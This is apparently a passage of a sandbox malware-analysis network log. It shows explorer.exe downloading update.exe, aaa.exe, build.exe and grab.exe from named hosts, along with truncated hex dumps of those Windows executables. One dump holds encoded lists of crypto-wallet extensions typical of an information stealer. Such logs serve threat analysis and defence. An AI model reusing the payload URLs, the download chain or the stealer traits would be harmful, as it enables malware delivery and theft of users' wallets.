                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.049675941 CEST1236INData Raw: 0c 00 00 06 d4 8d 44 00 00 01 28 0b 00 00 06 16 6a 28 0f 00 00 06 28 2f 00 00 06 28 20 00 00 06 16 28 18 00 00 06 16 28 1a 00 00 06 14 fe 06 21 00 00 06 73 3a 00 00 0a 14 73 27 00 00 0a 20 10 27 00 00 20 98 3a 00 00 6f 32 00 00 0a 73 27 00 00 0a
                                                                                                                                                                                                                                Data Ascii: D(j((/( ((!s:s' ' :o2s' ' :o2s;("s:s;((((i(is<o=&8(&(*AL&!
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.049685955 CEST1236INData Raw: 6f 7f 00 00 06 72 10 21 00 70 6f 8c 00 00 06 25 72 1a 21 00 70 6f 7f 00 00 06 28 35 00 00 06 6f 8c 00 00 06 6f 89 00 00 06 28 20 00 00 06 28 51 00 00 0a 17 28 1a 00 00 06 dd 06 00 00 00 26 dd 00 00 00 00 2a 01 10 00 00 00 00 00 00 49 49 00 06 01
                                                                                                                                                                                                                                Data Ascii: or!po%r!po(5oo( (Q(&*II0,(9(9(X(&*%%0v~(R~(SsT(UoVoWoX(Y9/(Z8;
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.049695969 CEST1236INData Raw: 0a 39 08 00 00 00 17 13 05 dd 4e 00 00 00 08 6f 85 00 00 0a 3a 6a ff ff ff dd 0d 00 00 00 08 39 06 00 00 00 08 6f 33 00 00 0a dc dd 0d 00 00 00 07 39 06 00 00 00 07 6f 33 00 00 0a dc dd 0d 00 00 00 06 39 06 00 00 00 06 6f 33 00 00 0a dc dd 06 00
                                                                                                                                                                                                                                Data Ascii: 9No:j9o39o39o3&**40%(Uo(;&&*0/rn#p(:(
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.049709082 CEST1236INData Raw: dd 31 00 00 00 72 48 25 00 70 07 6f a5 00 00 0a 28 a6 00 00 0a 13 04 dd 1a 00 00 00 06 39 06 00 00 00 06 6f 33 00 00 0a dc 26 72 40 25 00 70 13 04 dd 00 00 00 00 11 04 2a 01 28 00 00 02 00 31 00 2f 60 00 0d 00 00 00 00 02 00 1f 00 7c 9b 00 0d 00
                                                                                                                                                                                                                                Data Ascii: 1rH%po(9o3&r@%p*(1/`|09(8$oo(9*Xi2*0 (<&&*0@ s
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.049774885 CEST108INData Raw: 7f 00 00 06 6f 7a 00 00 06 28 41 00 00 06 26 7e 24 00 00 04 28 01 00 00 2b 6f bb 00 00 0a 0c 38 44 00 00 00 12 02 28 bc 00 00 0a 0d 09 72 90 25 00 70 6f 7f 00 00 06 6f 8b 00 00 06 06 72 bc 25 00 70 6f 7f 00 00 06 6f 8b 00 00 06 28 25 00 00 0a 39
                                                                                                                                                                                                                                Data Ascii: oz(A&~$(+o8D(r%poor%poo(%9(G~$o&(
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.050611973 CEST1236INData Raw: 00 00 0a 2d b3 dd 0e 00 00 00 12 02 fe 16 04 00 00 1b 6f 33 00 00 0a dc dd 0f 00 00 00 6f b3 00 00 0a 28 49 00 00 06 dd 00 00 00 00 2a 41 4c 00 00 00 00 00 00 a4 00 00 00 79 00 00 00 1d 01 00 00 0f 00 00 00 31 00 00 01 02 00 00 00 62 01 00 00 57
                                                                                                                                                                                                                                Data Ascii: -o3o(I*ALy1bW10(r%poo(B(or%po(~%: r%p(~%(%(
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.050687075 CEST1236INData Raw: 00 a9 00 00 00 0d 00 00 00 00 00 00 00 02 00 00 00 e2 00 00 00 42 00 00 00 24 01 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 1e 00 00 00 15 01 00 00 33 01 00 00 0d 00 00 00 00 00 00 00 02 00 00 00 18 00 00 00 28 01 00 00 40 01 00 00 0d 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: B$3(@0"8;Xi2*0n(oso9o3s8r&p(o&Xi2
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.054711103 CEST1236INData Raw: 38 00 00 00 49 00 00 00 5a 00 00 00 38 66 00 00 00 02 7b 35 00 00 04 a5 68 00 00 01 28 f0 00 00 0a 2a 02 7b 35 00 00 04 a5 95 00 00 01 2a 02 7b 35 00 00 04 6f 38 00 00 0a 6f f1 00 00 0a 28 f2 00 00 0a 2a 02 7b 35 00 00 04 a5 96 00 00 01 28 f3 00
                                                                                                                                                                                                                                Data Ascii: 8IZ8f{5h(*{5*{5o8o(*{5(*{5(*{5k(*j*0 {6YE"k8IZ8f{5h*{5h(*{5o8o(*{5


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                10192.168.2.449753192.3.140.185802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.298449993 CEST141OUTGET /update.exe HTTP/1.1
                                                                                                                                                                                                                                Host: www.igenius.org
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.850368977 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Sat, 06 Jul 2024 11:27:21 GMT
                                                                                                                                                                                                                                content-type: application/x-msdownload
                                                                                                                                                                                                                                content-length: 48640
                                                                                                                                                                                                                                server: nginx
                                                                                                                                                                                                                                last-modified: Wed, 03 Jul 2024 05:25:35 GMT
                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e5 ad 2d 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 00 00 00 0a 00 00 00 00 00 00 4e d0 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 cf 00 00 57 00 00 00 00 e0 00 00 ff 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL-eN @ @W H.textT `.rsrc@@.reloc@B0HYvV;$0xC=VDb9A./\(*~**~**~**~**~**~**~**~*~**~**~***(>*2~o?*.s*():((*:(+:(':((9(v*V(s o*n~9~o*~~(9(09(@*VrN%p~(o#*s%r!po [TRUNCATED]
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.850387096 CEST1236INData Raw: 00 70 6f 8c 00 00 06 6f 89 00 00 06 28 20 00 00 06 20 e8 03 00 00 28 14 00 00 0a 2a da 73 94 00 00 06 25 72 02 21 00 70 6f 7f 00 00 06 72 0c 26 00 70 6f 8c 00 00 06 25 72 0c 26 00 70 6f 7f 00 00 06 02 6f 8c 00 00 06 6f 89 00 00 06 28 20 00 00 06
                                                                                                                                                                                                                                Data Ascii: poo( (*s%r!por&po%r&pooo( *.s$*^(o(M(*^(((Oo*b D%-(,*2~.o*2~.o*2((X*D%%c%c%c*
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.850399017 CEST1236INData Raw: 00 00 20 88 13 00 00 28 14 00 00 0a 2b d4 00 00 00 01 1c 00 00 00 00 33 00 60 93 00 06 01 00 00 01 00 00 9a 00 19 b3 00 06 01 00 00 01 1b 30 02 00 2d 01 00 00 02 00 00 11 28 19 00 00 0a 7e 07 00 00 04 28 1a 00 00 0a 6f 1b 00 00 0a 80 07 00 00 04
                                                                                                                                                                                                                                Data Ascii: (+3`0-(~(o~sK~~oN~~oN~~oN~~oN~~oN~~oN~~oN~~
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.850508928 CEST672INData Raw: 0c 00 00 06 d4 8d 44 00 00 01 28 0b 00 00 06 16 6a 28 0f 00 00 06 28 2f 00 00 06 28 20 00 00 06 16 28 18 00 00 06 16 28 1a 00 00 06 14 fe 06 21 00 00 06 73 3a 00 00 0a 14 73 27 00 00 0a 20 10 27 00 00 20 98 3a 00 00 6f 32 00 00 0a 73 27 00 00 0a
                                                                                                                                                                                                                                Data Ascii: D(j((/( ((!s:s' ' :o2s' ' :o2s;("s:s;((((i(is<o=&8(&(*AL&!
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.850527048 CEST1236INData Raw: 28 0c 00 00 06 16 6a 30 98 14 fe 06 46 00 00 06 73 46 00 00 0a 73 47 00 00 0a 28 0a 00 00 06 6f 48 00 00 0a 16 6a 28 0f 00 00 06 1a 6a 28 0d 00 00 06 28 0c 00 00 06 d4 8d 44 00 00 01 28 0b 00 00 06 38 3a 00 00 00 1a 6a 28 0d 00 00 06 28 0c 00 00
                                                                                                                                                                                                                                Data Ascii: (j0FsFsG(oHj(j((D(8:j((D(j(8(j<(E(((i(is<o=&8(&(*A0(
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.850537062 CEST1236INData Raw: 00 00 0a 28 6f 00 00 0a 6f 71 00 00 0a 11 09 72 80 22 00 70 11 08 28 73 00 00 0a 72 8c 22 00 70 28 68 00 00 0a 6f 71 00 00 0a dd 0f 00 00 00 11 09 39 07 00 00 00 11 09 6f 33 00 00 0a dc 73 5c 00 00 0a 25 11 08 6f 5d 00 00 0a 25 17 6f 63 00 00 0a
                                                                                                                                                                                                                                Data Ascii: (ooqr"p(sr"p(hoq9o3s\%o]%oc%ot%ou%ob(d&(&*AdQ(y,Gl&oo10:!
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.850548983 CEST1236INData Raw: 0a 72 e6 23 00 70 72 f0 23 00 70 6f 95 00 00 0a 72 fc 23 00 70 72 08 24 00 70 6f 95 00 00 0a 28 68 00 00 0a 6f 8c 00 00 06 25 72 14 24 00 70 6f 7f 00 00 06 28 98 00 00 0a 6f 8c 00 00 06 25 72 1e 24 00 70 6f 7f 00 00 06 7e 03 00 00 04 6f 8c 00 00
                                                                                                                                                                                                                                Data Ascii: r#pr#por#pr$po(ho%r$po(o%r$po~o%r.$po(0(o}r:$pr.$porD$pr#poo%rP$po(5o%rh$po~o%rz$po(2o%r$po(sT((
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.850560904 CEST672INData Raw: 0d 00 00 00 00 00 00 00 00 2f 2f 00 0f 31 00 00 01 1b 30 02 00 3e 00 00 00 11 00 00 11 7e 65 00 00 0a 7e 23 00 00 04 6f b4 00 00 0a 0a 06 02 6f b6 00 00 0a 17 0b dd 1e 00 00 00 06 39 06 00 00 00 06 6f 33 00 00 0a dc 6f b3 00 00 0a 28 49 00 00 06
                                                                                                                                                                                                                                Data Ascii: //10>~e~#oo9o3o(I**++10C~er po~#o9o3o(I**#0010s
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.850677967 CEST1236INData Raw: 00 00 0a 2d b3 dd 0e 00 00 00 12 02 fe 16 04 00 00 1b 6f 33 00 00 0a dc dd 0f 00 00 00 6f b3 00 00 0a 28 49 00 00 06 dd 00 00 00 00 2a 41 4c 00 00 00 00 00 00 a4 00 00 00 79 00 00 00 1d 01 00 00 0f 00 00 00 31 00 00 01 02 00 00 00 62 01 00 00 57
                                                                                                                                                                                                                                Data Ascii: -o3o(I*ALy1bW10(r%poo(B(or%po(~%: r%p(~%(%(
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.850691080 CEST1236INData Raw: 00 a9 00 00 00 0d 00 00 00 00 00 00 00 02 00 00 00 e2 00 00 00 42 00 00 00 24 01 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 1e 00 00 00 15 01 00 00 33 01 00 00 0d 00 00 00 00 00 00 00 02 00 00 00 18 00 00 00 28 01 00 00 40 01 00 00 0d 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: B$3(@0"8;Xi2*0n(oso9o3s8r&p(o&Xi2
                                                                                                                                                                                                                                Jul 6, 2024 13:27:21.855422020 CEST1236INData Raw: 38 00 00 00 49 00 00 00 5a 00 00 00 38 66 00 00 00 02 7b 35 00 00 04 a5 68 00 00 01 28 f0 00 00 0a 2a 02 7b 35 00 00 04 a5 95 00 00 01 2a 02 7b 35 00 00 04 6f 38 00 00 0a 6f f1 00 00 0a 28 f2 00 00 0a 2a 02 7b 35 00 00 04 a5 96 00 00 01 28 f3 00
                                                                                                                                                                                                                                Data Ascii: 8IZ8f{5h(*{5*{5o8o(*{5(*{5(*{5k(*j*0 {6YE"k8IZ8f{5h*{5h(*{5o8o(*{5


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                11192.168.2.44976075.119.203.100802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:23.256465912 CEST182OUTGET /wp-admin/css/colors/ocean/grab.exe HTTP/1.1
                                                                                                                                                                                                                                Host: www.westnilebirdingandsafari.com
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Jul 6, 2024 13:27:23.871161938 CEST542INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Date: Sat, 06 Jul 2024 11:27:23 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Location: https://www.westnilebirdingandsafari.com/wp-admin/css/colors/ocean/grab.exe
                                                                                                                                                                                                                                Content-Length: 283
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 73 74 6e 69 6c 65 62 69 72 64 69 6e 67 61 6e 64 73 61 66 61 72 69 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 63 6f 6c 6f 72 73 2f 6f 63 65 61 6e 2f 67 72 61 62 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.westnilebirdingandsafari.com/wp-admin/css/colors/ocean/grab.exe">here</a>.</p></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                12192.168.2.449762192.3.140.185802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:23.876923084 CEST138OUTGET /aaa.exe HTTP/1.1
                                                                                                                                                                                                                                Host: www.igenius.org
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.518280029 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Sat, 06 Jul 2024 11:27:24 GMT
                                                                                                                                                                                                                                content-type: application/x-msdownload
                                                                                                                                                                                                                                content-length: 64512
                                                                                                                                                                                                                                server: nginx
                                                                                                                                                                                                                                last-modified: Wed, 03 Jul 2024 23:16:12 GMT
                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d2 37 48 62 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ea 00 00 00 10 00 00 00 00 00 00 9e 09 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 09 01 00 53 00 00 00 00 20 01 00 f5 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL7Hb @ `@HS @ H.text `.rsrc @@.reloc@@BHehWH3W3./\(*~**~**~**~**~**~**~**~*~**~**~***(C*2~oD*s%rpo(hrp(ooo( (*s%rporpo%rpooo( *Vssi*~"*"*F(+~!o*&o*^(4 [TRUNCATED]
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.518296957 CEST1236INData Raw: 28 36 00 00 06 26 28 35 00 00 06 26 2a 5e 14 fe 06 2e 00 00 06 73 8f 00 00 0a 73 90 00 00 0a 80 21 00 00 04 2a 6e 28 39 00 00 06 3a 10 00 00 00 28 3a 00 00 06 39 06 00 00 00 14 28 93 00 00 0a 2a 3e 28 3d 00 00 06 8e 3a 02 00 00 00 16 2a 17 2a 42
                                                                                                                                                                                                                                Data Ascii: (6&(5&*^.ss!*n(9:(:9(*>(=:**B~-(>o*rps-rps.r'ps/*V(s o*zo>oYo*(S%~(9rp(sz(T
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.518307924 CEST1236INData Raw: 28 a1 00 00 06 2a 22 02 03 28 ae 00 00 06 2a 1e 02 7b a1 01 00 04 2a 32 02 7b a3 01 00 04 73 88 00 00 06 2a 4a 02 73 69 00 00 0a 7d a3 01 00 04 02 28 1b 00 00 0a 2a 3a 02 6f 38 01 00 0a d2 02 28 c0 00 00 06 2a 32 02 20 c0 00 00 00 6f 26 01 00 0a
                                                                                                                                                                                                                                Data Ascii: (*"(*{*2{s*Jsi}(*:o8(*2 o&*j o&(oQ*~ o&(5(oQ*z9 o&* o&*0'8 (X~(2(:(~(
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.518389940 CEST1236INData Raw: 49 11 00 70 80 12 00 00 04 72 fc 11 00 70 80 13 00 00 04 2a 00 1b 30 07 00 f1 02 00 00 04 00 00 11 18 17 1c 73 28 00 00 0a 25 20 00 c8 00 00 6f 29 00 00 0a 25 20 00 c8 00 00 6f 2a 00 00 0a 28 07 00 00 06 7e 0d 00 00 04 72 af 12 00 70 28 2b 00 00
                                                                                                                                                                                                                                Data Ascii: Iprp*0s(% o)% o*(~rp(+9~I%,o,s-~I%,o,io.~I%,o,s-~I%,o,io.((9R(/89B(
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.518400908 CEST1236INData Raw: 00 06 16 6a 3c 0b 00 00 00 16 28 13 00 00 06 dd c6 00 00 00 28 0c 00 00 06 16 6a 30 98 14 fe 06 23 00 00 06 73 4b 00 00 0a 73 4c 00 00 0a 28 0a 00 00 06 6f 4d 00 00 0a 16 6a 28 0f 00 00 06 1a 6a 28 0d 00 00 06 28 0c 00 00 06 d4 8d 53 00 00 01 28
                                                                                                                                                                                                                                Data Ascii: j<((j0#sKsL(oMj(j((S(8:j((S(j(8(j<(E(((i(isAoB&8(&(*A
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.518412113 CEST1236INData Raw: 00 a4 00 00 00 79 00 00 00 1d 01 00 00 0f 00 00 00 41 00 00 01 02 00 00 00 62 01 00 00 57 00 00 00 b9 01 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc 01 00 00 cc 01 00 00 0f 00 00 00 41 00 00 01 13 30 0b 00 11 01 00 00 08 00 00 11 28
                                                                                                                                                                                                                                Data Ascii: yAbWA0(^rpoo(r(o_rQpo`(a~ : rmp(bd%(c%(c%(c%(c%(c%(c%(c%
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.518435001 CEST1236INData Raw: 02 28 62 00 00 0a 28 91 00 00 0a 7d 23 00 00 04 06 12 01 28 32 00 00 06 39 f1 00 00 00 07 7b 25 00 00 04 0c 07 7b 2c 00 00 04 0d 09 72 41 15 00 70 28 2f 00 00 06 3a c0 00 00 00 09 72 59 15 00 70 28 2f 00 00 06 3a b0 00 00 00 09 72 7d 15 00 70 28
                                                                                                                                                                                                                                Data Ascii: (b(}#(29{%{,rAp(/:rYp(/:r}p(/:rp(/:rp(/:rp(/:prp(/:`rp(/:Prp(/:@r?p(/:0rYp(/: rqp(/:rp(/
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.518567085 CEST1236INData Raw: 00 0a 16 1f 14 6f c1 00 00 0a 6f c2 00 00 0a 13 06 dd 0d 00 00 00 26 72 95 18 00 70 13 06 dd 00 00 00 00 11 06 2a 00 00 00 01 10 00 00 00 00 00 00 b5 b5 00 0d 01 00 00 01 13 30 07 00 d7 01 00 00 11 00 00 11 73 bd 00 00 06 25 72 bd 12 00 70 6f a8
                                                                                                                                                                                                                                Data Ascii: oo&rp*0s%rporpo%rpo~o%rpo(o=o%rpos(o=rporp((rprporprpo(o%rp
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.518578053 CEST1236INData Raw: 26 dd 00 00 00 00 00 7e 7d 00 00 0a 72 99 1a 00 70 17 6f e1 00 00 0a 72 ab 1a 00 70 17 6f e1 00 00 0a 72 cb 1a 00 70 6f e2 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 2a 00 01 28 00 00 00 00 00 00 36 36 00 06 01 00 00 01 00 00 3d 00 2a 67 00 06 01
                                                                                                                                                                                                                                Data Ascii: &~}rporporpo&*(66=*gn*0h(moo8*oto(:o'o-u@9o'~**<L0~
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.518589020 CEST1236INData Raw: 0a 28 ec 00 00 0a 6a 58 28 eb 00 00 0a 28 ee 00 00 0a 03 1b 6f ef 00 00 0a 39 55 00 00 00 0f 00 28 ea 00 00 0a 11 09 6a 58 11 0a 18 5a 6a 58 28 eb 00 00 0a 28 ed 00 00 0a 11 05 58 13 0b 0f 00 28 ea 00 00 0a 11 07 6a 58 1a 11 0b 11 05 59 5a 6a 58
                                                                                                                                                                                                                                Data Ascii: (jX((o9U(jXZjX((X(jXYZjX(((jX(8X?b&r)psz~(9r)p(sz*A0sf}s
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.527977943 CEST1236INData Raw: 1e 00 00 00 06 39 06 00 00 00 06 6f 27 00 00 0a dc 6f 58 00 00 0a 28 26 00 00 06 dd 00 00 00 00 16 2a 07 2a 00 01 1c 00 00 02 00 11 00 12 23 00 0d 00 00 00 00 00 00 00 00 30 30 00 0f 41 00 00 01 1b 30 03 00 5c 00 00 00 1d 00 00 11 02 28 1b 00 00
                                                                                                                                                                                                                                Data Ascii: 9o'oX(&**#00A0\((9rpsz~ Ps o}@o}9o'*-!N0:rpszs joSs o


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                13192.168.2.449764192.3.140.185802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Jul 6, 2024 13:27:24.902744055 CEST140OUTGET /build.exe HTTP/1.1
                                                                                                                                                                                                                                Host: www.igenius.org
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: CasperSecurity
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497742891 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Sat, 06 Jul 2024 11:27:25 GMT
                                                                                                                                                                                                                                content-type: application/x-msdownload
                                                                                                                                                                                                                                content-length: 307712
                                                                                                                                                                                                                                server: nginx
                                                                                                                                                                                                                                last-modified: Thu, 04 Jul 2024 00:04:16 GMT
                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 02 03 00 57 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELH(0 @ @4W H.text `.rsrc @@.reloc@BpH (wautofill5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1h [TRUNCATED]
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497760057 CEST1236INData Raw: 32 00 73 00 4b 00 59 00 57 00 5a 00 69 00 59 00 32 00 4a 00 71 00 63 00 47 00 4a 00 77 00 5a 00 6d 00 46 00 6b 00 62 00 47 00 74 00 74 00 61 00 47 00 31 00 6a 00 62 00 47 00 68 00 72 00 5a 00 57 00 56 00 76 00 5a 00 47 00 31 00 68 00 62 00 57 00
                                                                                                                                                                                                                                Data Ascii: 2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJ
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.497771025 CEST448INData Raw: 6d 00 61 00 32 00 4e 00 69 00 5a 00 32 00 56 00 72 00 61 00 47 00 56 00 75 00 59 00 6d 00 68 00 38 00 51 00 58 00 52 00 76 00 62 00 57 00 6c 00 6a 00 56 00 32 00 46 00 73 00 62 00 47 00 56 00 30 00 43 00 6d 00 35 00 73 00 59 00 6d 00 31 00 75 00
